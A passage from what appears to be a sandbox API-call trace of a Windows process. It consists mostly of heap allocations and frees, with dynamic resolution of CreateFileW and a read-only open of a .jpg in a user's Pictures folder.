RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0093.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0e8 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0093.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0093.166] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0093.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0093.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0093.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0093.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0093.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.167] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0093.167] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0093.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0093.168] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0093.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0093.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0093.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0093.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0093.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0093.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0093.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0093.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0093.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0093.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0093.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0093.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0093.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0093.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0093.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0093.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0093.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0093.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0093.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0093.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0093.170] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0093.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0093.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0093.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0093.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0093.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0093.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0093.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0093.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0093.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0093.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0093.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0093.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0093.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0093.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0093.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0093.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0093.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.173] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0093.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0093.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0093.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca8c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0093.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.174] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0093.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0093.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0093.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0093.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0093.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0093.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0093.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0093.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0093.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0093.174] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\AsLbgf0HCR8rP.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\aslbgf0hcr8rp.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0093.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0093.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0093.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0093.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0093.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0093.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0093.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0093.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0093.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0093.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0093.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0093.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0093.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0093.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 